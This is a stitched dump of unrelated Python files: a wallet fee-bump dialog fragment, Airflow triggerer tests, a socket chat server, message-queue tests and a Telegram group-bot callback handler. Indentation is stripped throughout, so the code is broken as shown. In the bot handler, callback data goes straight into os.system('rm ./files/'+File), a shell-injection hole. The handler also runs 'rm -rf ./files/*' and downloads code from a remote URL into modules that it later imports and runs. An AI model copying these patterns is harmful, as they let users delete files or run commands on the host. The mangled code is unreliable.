old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
test_triggerer_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import asyncio
import datetime
import time
from threading import Thread
import pytest
from airflow.jobs.triggerer_job import TriggererJob, TriggerRunner
from airflow.models import DagModel, DagRun, TaskInstance, Trigger
from airflow.operators.empty import EmptyOperator
from airflow.operators.python import PythonOperator
from airflow.triggers.base import TriggerEvent
from airflow.triggers.temporal import TimeDeltaTrigger
from airflow.triggers.testing import FailureTrigger, SuccessTrigger
from airflow.utils import timezone
from airflow.utils.session import create_session
from airflow.utils.state import State, TaskInstanceState
from tests.test_utils.db import clear_db_dags, clear_db_runs
class TimeDeltaTrigger_(TimeDeltaTrigger):
def __init__(self, delta, filename):
super().__init__(delta=delta)
self.filename = filename
self.delta = delta
async def run(self):
with open(self.filename, 'at') as f:
f.write('hi\n')
async for event in super().run():
yield event
def serialize(self):
return (
"tests.jobs.test_triggerer_job.TimeDeltaTrigger_",
{"delta": self.delta, "filename": self.filename},
)
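# TimeDeltaTrigger_ appends a line to `filename` each time its run() starts,
# which lets test_trigger_create_race_condition_18392 below count how many
# times the trigger was (re)created. Illustrative serialized form (the
# filename value here is hypothetical):
#   ("tests.jobs.test_triggerer_job.TimeDeltaTrigger_",
#    {"delta": datetime.timedelta(microseconds=1), "filename": "/tmp/t.txt"})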
@pytest.fixture(autouse=True)
def clean_database():
"""Fixture that cleans the database before and after every test."""
clear_db_runs()
clear_db_dags()
yield # Test runs here
clear_db_dags()
clear_db_runs()
@pytest.fixture
def session():
"""Fixture that provides a SQLAlchemy session"""
with create_session() as session:
yield session
def test_is_alive():
"""Checks the heartbeat logic"""
# Current time
triggerer_job = TriggererJob(None, heartrate=10, state=State.RUNNING)
assert triggerer_job.is_alive()
# Slightly old, but still fresh
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=20)
assert triggerer_job.is_alive()
# Old enough to fail
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=31)
assert not triggerer_job.is_alive()
# Completed state should not be alive
triggerer_job.state = State.SUCCESS
triggerer_job.latest_heartbeat = timezone.utcnow() - datetime.timedelta(seconds=10)
assert not triggerer_job.is_alive(), "Completed jobs even with recent heartbeat should not be alive"
def test_is_needed(session):
"""Checks the triggerer-is-needed logic"""
# No triggers, no need
triggerer_job = TriggererJob(None, heartrate=10, state=State.RUNNING)
assert triggerer_job.is_needed() is False
# Add a trigger, it's needed
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
assert triggerer_job.is_needed() is True
def test_capacity_decode():
"""
Tests that TriggererJob correctly sets capacity to a valid value passed in as a CLI arg,
handles invalid args, or sets it to a default value if no arg is passed.
"""
# Positive cases
variants = [
42,
None,
]
for input_str in variants:
job = TriggererJob(capacity=input_str)
        assert job.capacity == (input_str or 1000)  # None falls back to the default capacity of 1000
# Negative cases
variants = [
"NAN",
0.5,
-42,
4 / 2, # Resolves to a float, in addition to being just plain weird
]
for input_str in variants:
with pytest.raises(ValueError):
TriggererJob(capacity=input_str)
def test_trigger_lifecycle(session):
"""
Checks that the triggerer will correctly see a new Trigger in the database
and send it to the trigger runner, and then delete it when it vanishes.
"""
# Use a trigger that will not fire for the lifetime of the test
# (we want to avoid it firing and deleting itself)
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to appear in the TriggerRunner's storage
for _ in range(30):
if job.runner.triggers:
assert list(job.runner.triggers.keys()) == [1]
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never created trigger")
# OK, now remove it from the DB
session.delete(trigger_orm)
session.commit()
# Re-load the triggers
job.load_triggers()
# Wait for up to 3 seconds for it to vanish from the TriggerRunner's storage
for _ in range(30):
if not job.runner.triggers:
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never deleted trigger")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_create_race_condition_18392(session, tmp_path):
"""
This verifies the resolution of race condition documented in github issue #18392.
Triggers are queued for creation by TriggerJob.load_triggers.
There was a race condition where multiple triggers would be created unnecessarily.
What happens is the runner completes the trigger and purges from the "running" list.
Then job.load_triggers is called and it looks like the trigger is not running but should,
so it queues it again.
The scenario is as follows:
1. job.load_triggers (trigger now queued)
2. runner.create_triggers (trigger now running)
3. job.handle_events (trigger still appears running so state not updated in DB)
    4. runner.cleanup_finished_triggers (trigger completed at this point; trigger purged from "running" set)
5. job.load_triggers (trigger not running, but also not purged from DB, so it is queued again)
6. runner.create_triggers (trigger created again)
This test verifies that under this scenario only one trigger is created.
"""
path = tmp_path / 'test_trigger_bad_respawn.txt'
class TriggerRunner_(TriggerRunner):
"""We do some waiting for main thread looping"""
async def wait_for_job_method_count(self, method, count):
for _ in range(30):
await asyncio.sleep(0.1)
if getattr(self, f'{method}_count', 0) >= count:
break
else:
pytest.fail(f"did not observe count {count} in job method {method}")
async def create_triggers(self):
"""
On first run, wait for job.load_triggers to make sure they are queued
"""
if getattr(self, 'loop_count', 0) == 0:
await self.wait_for_job_method_count('load_triggers', 1)
await super().create_triggers()
self.loop_count = getattr(self, 'loop_count', 0) + 1
async def cleanup_finished_triggers(self):
"""On loop 1, make sure that job.handle_events was already called"""
if self.loop_count == 1:
await self.wait_for_job_method_count('handle_events', 1)
await super().cleanup_finished_triggers()
class TriggererJob_(TriggererJob):
"""We do some waiting for runner thread looping (and track calls in job thread)"""
def wait_for_runner_loop(self, runner_loop_count):
for _ in range(30):
time.sleep(0.1)
if getattr(self.runner, 'call_count', 0) >= runner_loop_count:
break
else:
pytest.fail("did not observe 2 loops in the runner thread")
def load_triggers(self):
"""On second run, make sure that runner has called create_triggers in its second loop"""
super().load_triggers()
self.runner.load_triggers_count = getattr(self.runner, 'load_triggers_count', 0) + 1
if self.runner.load_triggers_count == 2:
self.wait_for_runner_loop(runner_loop_count=2)
def handle_events(self):
super().handle_events()
self.runner.handle_events_count = getattr(self.runner, 'handle_events_count', 0) + 1
trigger = TimeDeltaTrigger_(delta=datetime.timedelta(microseconds=1), filename=path.as_posix())
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
dag = DagModel(dag_id='test-dag')
dag_run = DagRun(dag.dag_id, run_id='abc', run_type='none')
ti = TaskInstance(PythonOperator(task_id='dummy-task', python_callable=print), run_id=dag_run.run_id)
ti.dag_id = dag.dag_id
ti.trigger_id = 1
session.add(dag)
session.add(dag_run)
session.add(ti)
session.commit()
job = TriggererJob_()
job.runner = TriggerRunner_()
thread = Thread(target=job._execute)
thread.start()
try:
for _ in range(40):
time.sleep(0.1)
# ready to evaluate after 2 loops
if getattr(job.runner, 'loop_count', 0) >= 2:
break
else:
pytest.fail("did not observe 2 loops in the runner thread")
finally:
job.runner.stop = True
job.runner.join()
thread.join()
instances = path.read_text().splitlines()
assert len(instances) == 1
def test_trigger_from_dead_triggerer(session):
"""
Checks that the triggerer will correctly claim a Trigger that is assigned to a
triggerer that does not exist.
"""
# Use a trigger that has an invalid triggerer_id
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
trigger_orm.triggerer_id = 999 # Non-existent triggerer
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
def test_trigger_from_expired_triggerer(session):
"""
Checks that the triggerer will correctly claim a Trigger that is assigned to a
triggerer that has an expired heartbeat.
"""
# Use a trigger assigned to the expired triggerer
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
trigger_orm.triggerer_id = 42
session.add(trigger_orm)
# Use a TriggererJob with an expired heartbeat
triggerer_job_orm = TriggererJob()
triggerer_job_orm.id = 42
triggerer_job_orm.start_date = timezone.utcnow() - datetime.timedelta(hours=1)
triggerer_job_orm.end_date = None
triggerer_job_orm.latest_heartbeat = timezone.utcnow() - datetime.timedelta(hours=1)
session.add(triggerer_job_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in TriggerRunner's queue
assert [x for x, y in job.runner.to_create] == [1]
def test_trigger_firing(session):
"""
Checks that when a trigger fires, it correctly makes it into the
event queue.
"""
# Use a trigger that will immediately succeed
trigger = SuccessTrigger()
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to fire and appear in the event queue
for _ in range(30):
if job.runner.events:
assert list(job.runner.events) == [(1, TriggerEvent(True))]
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never sent the trigger event out")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_failing(session):
"""
Checks that when a trigger fails, it correctly makes it into the
failure queue.
"""
# Use a trigger that will immediately fail
trigger = FailureTrigger()
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Now, start TriggerRunner up (and set it as a daemon thread during tests)
job.runner.daemon = True
job.runner.start()
try:
# Wait for up to 3 seconds for it to fire and appear in the event queue
for _ in range(30):
if job.runner.failed_triggers:
assert len(job.runner.failed_triggers) == 1
trigger_id, exc = list(job.runner.failed_triggers)[0]
assert trigger_id == 1
assert isinstance(exc, ValueError)
assert exc.args[0] == "Deliberate trigger failure"
break
time.sleep(0.1)
else:
pytest.fail("TriggerRunner never marked the trigger as failed")
finally:
# We always have to stop the runner
job.runner.stop = True
def test_trigger_cleanup(session):
"""
Checks that the triggerer will correctly clean up triggers that do not
have any task instances depending on them.
"""
# Use a trigger that will not fire for the lifetime of the test
# (we want to avoid it firing and deleting itself)
trigger = TimeDeltaTrigger(datetime.timedelta(days=7))
trigger_orm = Trigger.from_object(trigger)
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Trigger the cleanup code
Trigger.clean_unused(session=session)
session.commit()
# Make sure it's gone
assert session.query(Trigger).count() == 0
def test_invalid_trigger(session, dag_maker):
"""
Checks that the triggerer will correctly fail task instances that depend on
triggers that can't even be loaded.
"""
# Create a totally invalid trigger
trigger_orm = Trigger(classpath="fake.classpath", kwargs={})
trigger_orm.id = 1
session.add(trigger_orm)
session.commit()
# Create the test DAG and task
with dag_maker(dag_id='test_invalid_trigger', session=session):
EmptyOperator(task_id='dummy1')
dr = dag_maker.create_dagrun()
task_instance = dr.task_instances[0]
# Make a task instance based on that and tie it to the trigger
task_instance.state = TaskInstanceState.DEFERRED
task_instance.trigger_id = 1
session.commit()
# Make a TriggererJob and have it retrieve DB tasks
job = TriggererJob()
job.load_triggers()
# Make sure it turned up in the failed queue
assert len(job.runner.failed_triggers) == 1
# Run the failed trigger handler
job.handle_failed_triggers()
# Make sure it marked the task instance as failed (which is actually the
# scheduled state with a payload to make it fail)
task_instance.refresh_from_db()
assert task_instance.state == TaskInstanceState.SCHEDULED
assert task_instance.next_method == "__fail__"
assert task_instance.next_kwargs['error'] == 'Trigger failure'
assert task_instance.next_kwargs['traceback'][-1] == "ModuleNotFoundError: No module named 'fake'\n"
|
utils.py
|
import datetime
import functools
import os
import sys
import threading
def get_dir_files(directory):
return os.listdir(directory if directory else '.')
def get_current_directory():
    # Note: despite the name, this returns the *parent* of the current
    # working directory, with a trailing path separator appended.
    return os.path.dirname(os.getcwd()) + os.path.normpath('/')
def get_platform():
return sys.platform
def unix_to_date(unix_timestamp):
date = datetime.datetime.fromtimestamp(unix_timestamp)
return date.strftime('%b %d %Y %H:%M:%S')
def asynchronous(func):
@functools.wraps(func)
def asynchronous_func(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return asynchronous_func
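# A minimal usage sketch for the helpers above; `slow_task` is a hypothetical
# function added for illustration, everything else is defined in this module.
if __name__ == '__main__':
    import time

    @asynchronous
    def slow_task(label):
        time.sleep(0.1)
        print('finished', label)

    slow_task('demo')  # returns immediately; the work runs in a daemon thread
    print(get_platform(), get_current_directory())
    time.sleep(0.2)  # keep the main thread alive so the daemon thread can finish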
|
nucleo.py
|
import socket
import threading
import time
ServerSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind() needs a local interface; the original remote hostname
# ('testeserver123.herokuapp.com') cannot be bound directly.
ServerSocket.bind(('0.0.0.0', 80))
ServerSocket.listen(50)
ClientsSocketsList = []
EnderecoList = []
Encode_mode = 'utf-8'
def transmitir(mensagem):
for EveryClient in ClientsSocketsList:
EveryClient.send(mensagem.encode(Encode_mode))
def receber_transmitir(ClientSocketParam):
    while True:
        try:
            msg = ClientSocketParam.recv(1024).decode(Encode_mode)
            transmitir(msg)
        except Exception:
            index_do_end_correspondente_ao_socket_problematico = ClientsSocketsList.index(ClientSocketParam)
            ClientSocketParam.close()
            print(f'{EnderecoList[index_do_end_correspondente_ao_socket_problematico]} disconnected from the SERVER')
            ClientsSocketsList.remove(ClientSocketParam)
            EnderecoList.pop(index_do_end_correspondente_ao_socket_problematico)
            break  # stop looping once the disconnected client is cleaned up
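# A minimal client-side sketch for manual testing (an assumption, not part of
# the original server): run it from a separate process against the bind
# address configured above.
def cliente_exemplo(host='127.0.0.1', porta=80):
    cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cliente.connect((host, porta))
    print(cliente.recv(1024).decode(Encode_mode))  # greeting sent by the server
    cliente.send('hello from the example client'.encode(Encode_mode))
    cliente.close()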
'''thread_de_transmissao = threading.Thread(target = transmitir, daemon = True)
thread_de_transmissao.start()'''
while True:
ClientSocket, Endereco = ServerSocket.accept()
EnderecoList.append(Endereco)
ClientsSocketsList.append(ClientSocket)
    ClientSocket.send('You have successfully connected to the server!'.encode(Encode_mode))
    print(f'{Endereco} connected to the SERVER')
threadclient = threading.Thread(target = receber_transmitir, args = (ClientSocket,), daemon = True )
threadclient.start()
|
test_completed_CompletedProducerOperator.py
|
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import time
from multiprocessing import Manager, Process
# Libs
# Custom
from synmanager.config import COMPLETED_QUEUE
from conftest import (
PROJECT_KEY, RUN_RECORD_1, RUN_RECORD_2,
enumerate_federated_conbinations
)
##################
# Configurations #
##################
#####################################
# Tests - CompletedProducerOperator #
#####################################
def test_CompletedProducerOperator_publish_message(
test_message,
completed_producer_operator
):
""" Tests if message publishing to the `Completed` queue is valid.
# C1: Check that a single message was published successfully
    # C2: Check that the published message is identical to the original
"""
completed_producer_operator.connect()
completed_producer_operator.publish_message(test_message)
# C1
declared_queue = completed_producer_operator.channel.queue_declare(
COMPLETED_QUEUE,
passive=False,
durable=True
)
queue_message_count = declared_queue.method.message_count
assert queue_message_count == 1
# C2
_, _, body = completed_producer_operator.channel.basic_get(
queue=COMPLETED_QUEUE,
auto_ack=True
)
assert body.decode() == test_message
completed_producer_operator.disconnect()
def test_CompletedProducerOperator_process(
test_kwargs,
completed_producer_operator
):
""" Tests if message generation is valid. Bulk messages are generated from
a set of declared arguments and sent to the `Completed` queue.
    # C1: Check that declared arguments were decomposed into the correct no. of jobs
# C2: Check that published message is composed of a single job
"""
completed_producer_operator.connect()
job_combinations = enumerate_federated_conbinations(**test_kwargs)
for job_key, job_kwargs in job_combinations.items():
completed_producer_operator.process(**{
'process': 'completed', # operations filter for MQ consumer
'combination_key': job_key,
'combination_params': job_kwargs
})
# C1
declared_queue = completed_producer_operator.channel.queue_declare(
COMPLETED_QUEUE,
passive=False,
durable=True
)
queue_message_count = declared_queue.method.message_count
assert queue_message_count == 2
store = Manager().list()
def message_callback(ch, method, properties, body):
decoded_msg = body.decode()
kwargs = completed_producer_operator.parse_message(decoded_msg)
store.append(kwargs)
completed_producer_operator.channel.basic_consume(
queue=COMPLETED_QUEUE,
on_message_callback=message_callback,
auto_ack=True
)
p = Process(target=completed_producer_operator.channel.start_consuming)
p.start()
    # Wait (bounded) for the consumer process to collect both messages,
    # instead of looping forever if something goes wrong.
    for _ in range(30):
        if len(store) == 2:
            break
        time.sleep(1)
    assert len(store) == 2
for federated_config in store:
# C2
registered_run = federated_config['combination_params']['run']
assert registered_run in [RUN_RECORD_1, RUN_RECORD_2]
p.terminate()
p.join()
p.close()
completed_producer_operator.disconnect()
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
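# Callback data arriving here is a JSON-encoded list, typically of the form
# [action, argument, user_id] (indexed below as date[0..2]; a few handlers
# also read date[3] as a chat id). Illustrative example:
#   json.dumps(["kickme-yes", "", 123456789])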
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
                        t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
                        t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
        if rank in ("sudo", "asudo", "sudos", "malk", "acreator", "creator", "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/Pandatele/Banda-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
